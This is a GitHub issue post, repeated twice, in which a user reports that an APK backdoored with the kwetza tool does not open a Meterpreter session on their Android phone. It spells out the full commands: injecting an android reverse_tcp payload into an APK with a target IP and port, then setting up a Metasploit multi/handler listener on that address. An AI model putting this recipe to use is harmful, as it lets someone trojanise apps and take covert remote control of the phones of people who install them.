You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I use this usage:
python kwetza.py myapk.apk tcp 192.168.1.13 4444 yes AssistActivity and then kwetza work and generate an apk in dist folder.
after that i create a meterpereter in msfconsole :
use multi/handler
set payload android/meterpereter/reverse_tcp
set LHOST 192.168.1.13
set LPORT 4444
run
i install that apk in my android phone and not happening in msfconsole and meterpereter session not opened!
Exactly like this video : https://www.youtube.com/watch?v=yw-nQpVU6Zk and not happening after install apk
The text was updated successfully, but these errors were encountered:
I use this usage:
python kwetza.py myapk.apk tcp 192.168.1.13 4444 yes AssistActivity and then kwetza work and generate an apk in dist folder.
after that i create a meterpereter in msfconsole :
use multi/handler
set payload android/meterpereter/reverse_tcp
set LHOST 192.168.1.13
set LPORT 4444
run
i install that apk in my android phone and not happening in msfconsole and meterpereter session not opened!
Exactly like this video : https://www.youtube.com/watch?v=yw-nQpVU6Zk and not happening after install apk
The text was updated successfully, but these errors were encountered: